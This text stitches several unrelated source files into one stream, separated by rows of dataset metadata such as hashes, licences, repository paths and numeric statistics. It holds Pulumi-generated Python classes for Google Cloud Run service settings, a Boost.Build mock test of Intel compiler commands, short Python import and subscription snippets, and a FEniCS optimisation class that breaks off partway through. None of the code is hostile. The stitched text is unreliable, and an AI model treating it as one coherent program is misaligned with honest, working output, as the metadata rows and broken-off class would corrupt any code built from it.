def secret_ref(self, value: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromSecretRefArgs']]):
pulumi.set(self, "secret_ref", value)
@pulumi.input_type
class ServiceTemplateSpecContainerEnvFromConfigMapRefArgs:
def __init__(__self__, *,
local_object_reference: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromConfigMapRefLocalObjectReferenceArgs']] = None,
optional: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input['ServiceTemplateSpecContainerEnvFromConfigMapRefLocalObjectReferenceArgs'] local_object_reference: The Secret to select from.
Structure is documented below.
:param pulumi.Input[bool] optional: Specify whether the Secret must be defined
"""
if local_object_reference is not None:
pulumi.set(__self__, "local_object_reference", local_object_reference)
if optional is not None:
pulumi.set(__self__, "optional", optional)
@property
@pulumi.getter(name="localObjectReference")
def local_object_reference(self) -> Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromConfigMapRefLocalObjectReferenceArgs']]:
"""
The Secret to select from.
Structure is documented below.
"""
return pulumi.get(self, "local_object_reference")
@local_object_reference.setter
def local_object_reference(self, value: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromConfigMapRefLocalObjectReferenceArgs']]):
pulumi.set(self, "local_object_reference", value)
@property
@pulumi.getter
def optional(self) -> Optional[pulumi.Input[bool]]:
"""
Specify whether the Secret must be defined
"""
return pulumi.get(self, "optional")
@optional.setter
def optional(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "optional", value)
@pulumi.input_type
class ServiceTemplateSpecContainerEnvFromConfigMapRefLocalObjectReferenceArgs:
def __init__(__self__, *,
name: pulumi.Input[str]):
"""
:param pulumi.Input[str] name: Volume's name.
"""
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Volume's name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@pulumi.input_type
class ServiceTemplateSpecContainerEnvFromSecretRefArgs:
def __init__(__self__, *,
local_object_reference: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromSecretRefLocalObjectReferenceArgs']] = None,
optional: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input['ServiceTemplateSpecContainerEnvFromSecretRefLocalObjectReferenceArgs'] local_object_reference: The Secret to select from.
Structure is documented below.
:param pulumi.Input[bool] optional: Specify whether the Secret must be defined
"""
if local_object_reference is not None:
pulumi.set(__self__, "local_object_reference", local_object_reference)
if optional is not None:
pulumi.set(__self__, "optional", optional)
@property
@pulumi.getter(name="localObjectReference")
def local_object_reference(self) -> Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromSecretRefLocalObjectReferenceArgs']]:
"""
The Secret to select from.
Structure is documented below.
"""
return pulumi.get(self, "local_object_reference")
@local_object_reference.setter
def local_object_reference(self, value: Optional[pulumi.Input['ServiceTemplateSpecContainerEnvFromSecretRefLocalObjectReferenceArgs']]):
pulumi.set(self, "local_object_reference", value)
@property
@pulumi.getter
def optional(self) -> Optional[pulumi.Input[bool]]:
"""
Specify whether the Secret must be defined
"""
return pulumi.get(self, "optional")
@optional.setter
def optional(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "optional", value)
@pulumi.input_type
class ServiceTemplateSpecContainerEnvFromSecretRefLocalObjectReferenceArgs:
def __init__(__self__, *,
name: pulumi.Input[str]):
"""
:param pulumi.Input[str] name: Volume's name.
"""
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Volume's name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@pulumi.input_type
class ServiceTemplateSpecContainerEnvValueFromArgs:
def __init__(__self__, *,
secret_key_ref: pulumi.Input['ServiceTemplateSpecContainerEnvValueFromSecretKeyRefArgs']):
"""
:param pulumi.Input['ServiceTemplateSpecContainerEnvValueFromSecretKeyRefArgs'] secret_key_ref: Selects a key (version) of a secret in Secret Manager.
Structure is documented below.
"""
pulumi.set(__self__, "secret_key_ref", secret_key_ref)
@property
@pulumi.getter(name="secretKeyRef")
def secret_key_ref(self) -> pulumi.Input['ServiceTemplateSpecContainerEnvValueFromSecretKeyRefArgs']:
"""
Selects a key (version) of a secret in Secret Manager.
Structure is documented below.
"""
return pulumi.get(self, "secret_key_ref")
@secret_key_ref.setter
def secret_key_ref(self, value: pulumi.Input['ServiceTemplateSpecContainerEnvValueFromSecretKeyRefArgs']):
pulumi.set(self, "secret_key_ref", value)
@pulumi.input_type
class ServiceTemplateSpecContainerEnvValueFromSecretKeyRefArgs:
def __init__(__self__, *,
key: pulumi.Input[str],
name: pulumi.Input[str]):
"""
:param pulumi.Input[str] key: The Cloud Secret Manager secret version.
Can be 'latest' for the latest value or an integer for a specific version.
:param pulumi.Input[str] name: Volume's name.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
The Cloud Secret Manager secret version.
Can be 'latest' for the latest value or an integer for a specific version.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Volume's name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@pulumi.input_type
class ServiceTemplateSpecContainerPortArgs:
def __init__(__self__, *,
container_port: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
protocol: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] container_port: Port number the container listens on. This must be a valid port number, 0 < x < 65536.
:param pulumi.Input[str] name: Volume's name.
:param pulumi.Input[str] protocol: Protocol for port. Must be "TCP". Defaults to "TCP".
"""
if container_port is not None:
pulumi.set(__self__, "container_port", container_port)
if name is not None:
pulumi.set(__self__, "name", name)
if protocol is not None:
pulumi.set(__self__, "protocol", protocol)
@property
@pulumi.getter(name="containerPort")
def container_port(self) -> Optional[pulumi.Input[int]]:
"""
Port number the container listens on. This must be a valid port number, 0 < x < 65536.
"""
return pulumi.get(self, "container_port")
@container_port.setter
def container_port(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "container_port", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Volume's name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def protocol(self) -> Optional[pulumi.Input[str]]:
"""
Protocol for port. Must be "TCP". Defaults to "TCP".
"""
return pulumi.get(self, "protocol")
@protocol.setter
def protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "protocol", value)
@pulumi.input_type
class ServiceTemplateSpecContainerResourcesArgs:
def __init__(__self__, *,
limits: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
requests: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] limits: Limits describes the maximum amount of compute resources allowed.
The values of the map is string form of the 'quantity' k8s type:
https://github.com/kubernetes/kubernetes/blob/master/staging/src/k8s.io/apimachinery/pkg/api/resource/quantity.go
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] requests: Requests describes the minimum amount of compute resources required.
If Requests is omitted for a container, it defaults to Limits if that is
explicitly specified, otherwise to an implementation-defined value.
The values of the map is string form of the 'quantity' k8s type:
https://github.com/kubernetes/kubernetes/blob/master/staging/src/k8s.io/apimachinery/pkg/api/resource/quantity.go
"""
if limits is not None:
pulumi.set(__self__, "limits", limits)
if requests is not None:
pulumi.set(__self__, "requests", requests)
@property
@pulumi.getter
def limits(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Limits describes the maximum amount of compute resources allowed.
The values of the map is string form of the 'quantity' k8s type:
https://github.com/kubernetes/kubernetes/blob/master/staging/src/k8s.io/apimachinery/pkg/api/resource/quantity.go
"""
return pulumi.get(self, "limits")
@limits.setter
def limits(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "limits", value)
@property
@pulumi.getter
def requests(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Requests describes the minimum amount of compute resources required.
If Requests is omitted for a container, it defaults to Limits if that is
explicitly specified, otherwise to an implementation-defined value.
The values of the map is string form of the 'quantity' k8s type:
https://github.com/kubernetes/kubernetes/blob/master/staging/src/k8s.io/apimachinery/pkg/api/resource/quantity.go
"""
return pulumi.get(self, "requests")
@requests.setter
def requests(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "requests", value)
@pulumi.input_type
class ServiceTemplateSpecContainerVolumeMountArgs:
def __init__(__self__, *,
mount_path: pulumi.Input[str],
name: pulumi.Input[str]):
"""
:param pulumi.Input[str] mount_path: Path within the container at which the volume should be mounted. Must
not contain ':'.
:param pulumi.Input[str] name: Volume's name.
"""
pulumi.set(__self__, "mount_path", mount_path)
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="mountPath")
def mount_path(self) -> pulumi.Input[str]:
"""
Path within the container at which the volume should be mounted. Must
not contain ':'.
"""
return pulumi.get(self, "mount_path")
@mount_path.setter
def mount_path(self, value: pulumi.Input[str]):
pulumi.set(self, "mount_path", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Volume's name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@pulumi.input_type
class ServiceTemplateSpecVolumeArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
secret: pulumi.Input['ServiceTemplateSpecVolumeSecretArgs']):
"""
:param pulumi.Input[str] name: Volume's name.
:param pulumi.Input['ServiceTemplateSpecVolumeSecretArgs'] secret: The secret's value will be presented as the content of a file whose
name is defined in the item path. If no items are defined, the name of
the file is the secret_name.
Structure is documented below.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "secret", secret)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
Volume's name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def secret(self) -> pulumi.Input['ServiceTemplateSpecVolumeSecretArgs']:
"""
The secret's value will be presented as the content of a file whose
name is defined in the item path. If no items are defined, the name of
the file is the secret_name.
Structure is documented below.
"""
return pulumi.get(self, "secret")
@secret.setter
def secret(self, value: pulumi.Input['ServiceTemplateSpecVolumeSecretArgs']):
pulumi.set(self, "secret", value)
@pulumi.input_type
class ServiceTemplateSpecVolumeSecretArgs:
def __init__(__self__, *,
secret_name: pulumi.Input[str],
default_mode: Optional[pulumi.Input[int]] = None,
items: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecVolumeSecretItemArgs']]]] = None):
"""
:param pulumi.Input[str] secret_name: The name of the secret in Cloud Secret Manager. By default, the secret
is assumed to be in the same project.
If the secret is in another project, you must define an alias.
An alias definition has the form:
<alias>:projects/<project-id|project-number>/secrets/<secret-name>.
If multiple alias definitions are needed, they must be separated by
commas.
The alias definitions must be set on the run.googleapis.com/secrets
annotation.
:param pulumi.Input[int] default_mode: Mode bits to use on created files by default. Must be a value between 0000
and 0777. Defaults to 0644. Directories within the path are not affected by
this setting. This might be in conflict with other options that affect the
file mode, like fsGroup, and the result can be other mode bits set.
:param pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecVolumeSecretItemArgs']]] items: If unspecified, the volume will expose a file whose name is the
secret_name.
If specified, the key will be used as the version to fetch from Cloud
Secret Manager and the path will be the name of the file exposed in the
volume. When items are defined, they must specify a key and a path.
Structure is documented below.
"""
pulumi.set(__self__, "secret_name", secret_name)
if default_mode is not None:
pulumi.set(__self__, "default_mode", default_mode)
if items is not None:
pulumi.set(__self__, "items", items)
@property
@pulumi.getter(name="secretName")
def secret_name(self) -> pulumi.Input[str]:
"""
The name of the secret in Cloud Secret Manager. By default, the secret
is assumed to be in the same project.
If the secret is in another project, you must define an alias.
An alias definition has the form:
<alias>:projects/<project-id|project-number>/secrets/<secret-name>.
If multiple alias definitions are needed, they must be separated by
commas.
The alias definitions must be set on the run.googleapis.com/secrets
annotation.
"""
return pulumi.get(self, "secret_name")
@secret_name.setter
def secret_name(self, value: pulumi.Input[str]):
pulumi.set(self, "secret_name", value)
@property
@pulumi.getter(name="defaultMode")
def default_mode(self) -> Optional[pulumi.Input[int]]:
"""
Mode bits to use on created files by default. Must be a value between 0000
and 0777. Defaults to 0644. Directories within the path are not affected by
this setting. This might be in conflict with other options that affect the
file mode, like fsGroup, and the result can be other mode bits set.
"""
return pulumi.get(self, "default_mode")
@default_mode.setter
def default_mode(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "default_mode", value)
@property
@pulumi.getter
def items(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecVolumeSecretItemArgs']]]]:
"""
If unspecified, the volume will expose a file whose name is the
secret_name.
If specified, the key will be used as the version to fetch from Cloud
Secret Manager and the path will be the name of the file exposed in the
volume. When items are defined, they must specify a key and a path.
Structure is documented below.
"""
return pulumi.get(self, "items")
@items.setter
def items(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceTemplateSpecVolumeSecretItemArgs']]]]):
pulumi.set(self, "items", value)
@pulumi.input_type
class ServiceTemplateSpecVolumeSecretItemArgs:
def __init__(__self__, *,
key: pulumi.Input[str],
path: pulumi.Input[str],
mode: Optional[pulumi.Input[int]] = None):
"""
:param pulumi.Input[str] key: The Cloud Secret Manager secret version.
Can be 'latest' for the latest value or an integer for a specific version.
:param pulumi.Input[str] path: The relative path of the file to map the key to.
May not be an absolute path.
May not contain the path element '..'.
May not start with the string '..'.
:param pulumi.Input[int] mode: Mode bits to use on this file, must be a value between 0000 and 0777. If
not specified, the volume defaultMode will be used. This might be in
conflict with other options that affect the file mode, like fsGroup, and
the result can be other mode bits set.
"""
pulumi.set(__self__, "key", key)
pulumi.set(__self__, "path", path)
if mode is not None:
pulumi.set(__self__, "mode", mode)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
The Cloud Secret Manager secret version.
Can be 'latest' for the latest value or an integer for a specific version.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def path(self) -> pulumi.Input[str]:
"""
The relative path of the file to map the key to.
May not be an absolute path.
May not contain the path element '..'.
May not start with the string '..'.
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: pulumi.Input[str]):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def mode(self) -> Optional[pulumi.Input[int]]:
"""
Mode bits to use on this file, must be a value between 0000 and 0777. If
not specified, the volume defaultMode will be used. This might be in
conflict with other options that affect the file mode, like fsGroup, and
the result can be other mode bits set.
"""
return pulumi.get(self, "mode")
@mode.setter
def mode(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "mode", value)
@pulumi.input_type
class ServiceTrafficArgs:
def __init__(__self__, *,
percent: pulumi.Input[int],
latest_revision: Optional[pulumi.Input[bool]] = None,
revision_name: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] percent: Percent specifies percent of the traffic to this Revision or Configuration.
:param pulumi.Input[bool] latest_revision: LatestRevision may be optionally provided to indicate that the latest ready
Revision of the Configuration should be used for this traffic target. When
provided LatestRevision must be true if RevisionName is empty; it must be
false when RevisionName is non-empty.
:param pulumi.Input[str] revision_name: RevisionName of a specific revision to which to send this portion of traffic.
"""
pulumi.set(__self__, "percent", percent)
if latest_revision is not None:
pulumi.set(__self__, "latest_revision", latest_revision)
if revision_name is not None:
pulumi.set(__self__, "revision_name", revision_name)
@property
@pulumi.getter
def percent(self) -> pulumi.Input[int]:
"""
Percent specifies percent of the traffic to this Revision or Configuration.
"""
return pulumi.get(self, "percent")
@percent.setter
def percent(self, value: pulumi.Input[int]):
pulumi.set(self, "percent", value)
@property
@pulumi.getter(name="latestRevision")
def latest_revision(self) -> Optional[pulumi.Input[bool]]:
"""
LatestRevision may be optionally provided to indicate that the latest ready
Revision of the Configuration should be used for this traffic target. When
provided LatestRevision must be true if RevisionName is empty; it must be
false when RevisionName is non-empty.
"""
return pulumi.get(self, "latest_revision")
@latest_revision.setter
def latest_revision(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "latest_revision", value)
@property
@pulumi.getter(name="revisionName")
def revision_name(self) -> Optional[pulumi.Input[str]]:
"""
RevisionName of a specific revision to which to send this portion of traffic.
"""
return pulumi.get(self, "revision_name")
@revision_name.setter
def revision_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "revision_name", value)
| 42.845164
| 167
| 0.654317
| 10,492
| 89,932
| 5.500572
| 0.052516
| 0.092442
| 0.05919
| 0.044601
| 0.851989
| 0.798985
| 0.771486
| 0.724598
| 0.70637
| 0.673551
| 0
| 0.001314
| 0.246698
| 89,932
| 2,098
| 168
| 42.865586
| 0.850574
| 0.364698
| 0
| 0.585562
| 1
| 0
| 0.136475
| 0.073078
| 0
| 0
| 0
| 0
| 0
| 1
| 0.205882
| false
| 0
| 0.004456
| 0.022282
| 0.326203
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
314d6c458d80988073b9bf9f64160774e96af8cb
| 5,732
|
py
|
Python
|
test/toolset-mock/src/intel-darwin-10.2.py
|
MaxSac/build
|
482c25f3a26171073c7e6c59f0427f2259a63fec
|
[
"BSL-1.0"
] | 11,356
|
2017-12-08T19:42:32.000Z
|
2022-03-31T16:55:25.000Z
|
test/toolset-mock/src/intel-darwin-10.2.py
|
MaxSac/build
|
482c25f3a26171073c7e6c59f0427f2259a63fec
|
[
"BSL-1.0"
] | 2,402
|
2017-12-08T22:31:01.000Z
|
2022-03-28T19:25:52.000Z
|
test/toolset-mock/src/intel-darwin-10.2.py
|
MaxSac/build
|
482c25f3a26171073c7e6c59f0427f2259a63fec
|
[
"BSL-1.0"
] | 1,343
|
2017-12-08T19:47:19.000Z
|
2022-03-26T11:31:36.000Z
|
#!/usr/bin/python
#
# Copyright 2017 Steven Watanabe
#
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
from MockProgram import *
command('icc', '-print-prog-name=ar', stdout=script('ar.py'))
command('icc', '-print-prog-name=ranlib', stdout=script('ranlib.py'))
# all builds are multi-threaded for darwin
if allow_properties("variant=debug", "link=shared", "runtime-link=shared"):
command('icc', '-xc++', unordered('-O0', '-inline-level=0', '-w1', '-g', '-vec-report0', '-fPIC'), '-c', '-o', output_file('bin/intel-darwin-10.2/debug/target-os-darwin/lib.o'), input_file(source='lib.cpp'))
command('icc', '-o', output_file('bin/intel-darwin-10.2/debug/target-os-darwin/libl1.dylib'), '-single_module', '-dynamiclib', '-install_name', 'libl1.dylib', input_file('bin/intel-darwin-10.2/debug/target-os-darwin/lib.o'), unordered('-g', ordered('-shared-intel', '-lstdc++', '-lpthread'), '-fPIC'))
command('icc', '-xc++', unordered('-O0', '-inline-level=0', '-w1', '-g', '-vec-report0', '-fPIC'), '-c', '-o', output_file('bin/intel-darwin-10.2/debug/target-os-darwin/main.o'), input_file(source='main.cpp'))
command('icc', '-o', output_file('bin/intel-darwin-10.2/debug/target-os-darwin/test'), input_file('bin/intel-darwin-10.2/debug/target-os-darwin/main.o'), input_file('bin/intel-darwin-10.2/debug/target-os-darwin/libl1.dylib'), unordered('-g', ordered('-shared-intel', '-lstdc++', '-lpthread'), '-fPIC'))
if allow_properties("variant=release", "link=shared", "runtime-link=shared"):
command('icc', '-xc++', unordered('-O3', '-inline-level=2', '-w1', '-vec-report0', '-fPIC'), '-DNDEBUG', '-c', '-o', output_file('bin/intel-darwin-10.2/release/target-os-darwin/lib.o'), input_file(source='lib.cpp'))
command('icc', '-o', output_file('bin/intel-darwin-10.2/release/target-os-darwin/libl1.dylib'), '-single_module', '-dynamiclib', '-install_name', 'libl1.dylib', input_file('bin/intel-darwin-10.2/release/target-os-darwin/lib.o'), unordered(ordered('-shared-intel', '-lstdc++', '-lpthread'), '-fPIC'))
command('icc', '-xc++', unordered('-O3', '-inline-level=2', '-w1', '-vec-report0', '-fPIC'), '-DNDEBUG', '-c', '-o', output_file('bin/intel-darwin-10.2/release/target-os-darwin/main.o'), input_file(source='main.cpp'))
command('icc', '-o', output_file('bin/intel-darwin-10.2/release/target-os-darwin/test'), input_file('bin/intel-darwin-10.2/release/target-os-darwin/main.o'), input_file('bin/intel-darwin-10.2/release/target-os-darwin/libl1.dylib'), unordered(ordered('-shared-intel', '-lstdc++', '-lpthread'), '-fPIC'))
if allow_properties("variant=debug", "link=static", "runtime-link=shared"):
command('icc', '-xc++', unordered('-O0', '-inline-level=0', '-w1', '-g', '-vec-report0'), '-c', '-o', output_file('bin/intel-darwin-10.2/debug/link-static/target-os-darwin/lib.o'), input_file(source='lib.cpp'))
command('icc', '-xc++', unordered('-O0', '-inline-level=0', '-w1', '-g', '-vec-report0'), '-c', '-o', output_file('bin/intel-darwin-10.2/debug/link-static/target-os-darwin/main.o'), input_file(source='main.cpp'))
command('icc', '-o', output_file('bin/intel-darwin-10.2/debug/link-static/target-os-darwin/test'), input_file('bin/intel-darwin-10.2/debug/link-static/target-os-darwin/main.o'), input_file('bin/intel-darwin-10.2/debug/link-static/target-os-darwin/libl1.a'), '-g', ordered('-shared-intel', '-lstdc++', '-lpthread'))
if allow_properties("variant=debug", "link=static", "runtime-link=static"):
command('icc', '-xc++', unordered('-O0', '-inline-level=0', '-w1', '-g', '-vec-report0'), '-c', '-o', output_file('bin/intel-darwin-10.2/debug/link-static/runtime-link-static/target-os-darwin/lib.o'), input_file(source='lib.cpp'))
command('icc', '-xc++', unordered('-O0', '-inline-level=0', '-w1', '-g', '-vec-report0'), '-c', '-o', output_file('bin/intel-darwin-10.2/debug/link-static/runtime-link-static/target-os-darwin/main.o'), input_file(source='main.cpp'))
command('icc', '-o', output_file('bin/intel-darwin-10.2/debug/link-static/runtime-link-static/target-os-darwin/test'), input_file('bin/intel-darwin-10.2/debug/link-static/runtime-link-static/target-os-darwin/main.o'), input_file('bin/intel-darwin-10.2/debug/link-static/runtime-link-static/target-os-darwin/libl1.a'), unordered('-g', ordered('-static', '-static-intel', '-lstdc++', '-lpthread'), '-static'))
if allow_properties("variant=debug", "link=shared", "runtime-link=shared", "architecture=x86", "address-model=32"):
command('icc', '-xc++', unordered('-O0', '-inline-level=0', '-w1', '-g', '-vec-report0', '-march=i686', '-fPIC', '-m32'), '-c', '-o', output_file('bin/intel-darwin-10.2/debug/x86/target-os-darwin/lib.o'), input_file(source='lib.cpp'))
command('icc', '-o', output_file('bin/intel-darwin-10.2/debug/x86/target-os-darwin/libl1.dylib'), '-single_module', '-dynamiclib', '-install_name', 'libl1.dylib', input_file('bin/intel-darwin-10.2/debug/x86/target-os-darwin/lib.o'), unordered('-g', ordered('-shared-intel', '-lstdc++', '-lpthread'), '-march=i686', '-fPIC', '-m32'))
command('icc', '-xc++', unordered('-O0', '-inline-level=0', '-w1', '-g', '-vec-report0', '-march=i686', '-fPIC', '-m32'), '-c', '-o', output_file('bin/intel-darwin-10.2/debug/x86/target-os-darwin/main.o'), input_file(source='main.cpp'))
command('icc', '-o', output_file('bin/intel-darwin-10.2/debug/x86/target-os-darwin/test'), input_file('bin/intel-darwin-10.2/debug/x86/target-os-darwin/main.o'), input_file('bin/intel-darwin-10.2/debug/x86/target-os-darwin/libl1.dylib'), unordered('-g', ordered('-shared-intel', '-lstdc++', '-lpthread'), '-march=i686', '-fPIC', '-m32'))
main()
| 130.272727
| 411
| 0.670796
| 874
| 5,732
| 4.33524
| 0.114416
| 0.057271
| 0.098179
| 0.147268
| 0.908947
| 0.896807
| 0.886778
| 0.87886
| 0.87886
| 0.854579
| 0
| 0.035728
| 0.062456
| 5,732
| 43
| 412
| 133.302326
| 0.669334
| 0.040998
| 0
| 0
| 0
| 1.074074
| 0.600838
| 0.342503
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.037037
| 0
| 0.037037
| 0.074074
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
31774d11f1a5718a8affdbbdc8f9ef93ccf959d9
| 242
|
py
|
Python
|
polyaxon/activitylogs/events/notebook.py
|
elyase/polyaxon
|
1c19f059a010a6889e2b7ea340715b2bcfa382a0
|
[
"MIT"
] | null | null | null |
polyaxon/activitylogs/events/notebook.py
|
elyase/polyaxon
|
1c19f059a010a6889e2b7ea340715b2bcfa382a0
|
[
"MIT"
] | null | null | null |
polyaxon/activitylogs/events/notebook.py
|
elyase/polyaxon
|
1c19f059a010a6889e2b7ea340715b2bcfa382a0
|
[
"MIT"
] | null | null | null |
import activitylogs
from event_manager.events import notebook
activitylogs.subscribe(notebook.NotebookStartedTriggeredEvent)
activitylogs.subscribe(notebook.NotebookSoppedTriggeredEvent)
activitylogs.subscribe(notebook.NotebookViewedEvent)
| 30.25
| 62
| 0.900826
| 20
| 242
| 10.85
| 0.55
| 0.290323
| 0.400922
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 242
| 7
| 63
| 34.571429
| 0.939394
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
31d9438a72f9fa3f4c37b019dcab7c5a0b22af82
| 100
|
py
|
Python
|
cvxgraphalgs/algorithms/__init__.py
|
hermish/cvx-graph-algorithms
|
733e137a906bd6c2965d5853d2798a8a01db945c
|
[
"MIT"
] | 7
|
2020-05-11T10:01:31.000Z
|
2021-11-16T16:08:29.000Z
|
cvxgraphalgs/algorithms/__init__.py
|
hermish/graph-algorithms
|
733e137a906bd6c2965d5853d2798a8a01db945c
|
[
"MIT"
] | 1
|
2020-05-12T16:15:33.000Z
|
2020-06-05T16:40:57.000Z
|
cvxgraphalgs/algorithms/__init__.py
|
hermish/cvx-graph-algorithms
|
733e137a906bd6c2965d5853d2798a8a01db945c
|
[
"MIT"
] | null | null | null |
from cvxgraphalgs.algorithms.independent_set import *
from cvxgraphalgs.algorithms.max_cut import *
| 33.333333
| 53
| 0.86
| 12
| 100
| 7
| 0.666667
| 0.380952
| 0.619048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08
| 100
| 2
| 54
| 50
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
73093338aaebcf99b3b8f0903493c0a502e7fa62
| 15,483
|
py
|
Python
|
PDEConsOptProblem.py
|
OliverBamford/msc-proj
|
c3ac8d9768c3b53bb9716eefc524b590ac513aed
|
[
"MIT"
] | null | null | null |
PDEConsOptProblem.py
|
OliverBamford/msc-proj
|
c3ac8d9768c3b53bb9716eefc524b590ac513aed
|
[
"MIT"
] | null | null | null |
PDEConsOptProblem.py
|
OliverBamford/msc-proj
|
c3ac8d9768c3b53bb9716eefc524b590ac513aed
|
[
"MIT"
] | null | null | null |
from fenics import *
import matplotlib.pyplot as plt
import numpy as np
class PDEConsOptProblem:
def __init__(self, N, p, ue = Expression('sin(pi*x[0])*sin(pi*x[1])', degree=3), alpha = 1e-07):
"""
Sets up the 'hello world' PDE-constrained optimisation problem
Inputs:
N: number of finite elements in mesh
p: order of function space
ue: Desired distribution (UFL expression)
alpha: regularisation parameter
"""
mesh = UnitSquareMesh(N,N)
V = FunctionSpace(mesh, "CG", p)
self.ud = interpolate(ue , V)
self.lmbd = interpolate(Constant(1.0), V)
self.m = interpolate(Constant(1.0), V)
self.mt = Function(V)
self.RdJ = Function(V)
self.u = Function(V)
self.u_k = Function(V)
self.alpha = alpha
self.bc = DirichletBC(V, 0., "on_boundary")
v = TestFunction(V)
#form of state equation
u_ = TrialFunction(V)
self.F = inner(grad(u_), grad(v))*dx - self.m*v*dx
#form of adjoint
lmbd_ = TrialFunction(V)
self.F_adj = inner(grad(lmbd_), grad(v))*dx + (self.u - self.ud)*v*dx
# form of dJ = (RdJ, v)
RdJ_ = TrialFunction(V)
self.F_R = RdJ_*v*dx - (self.alpha*self.m - self.lmbd)*v*dx
#form of objective functional
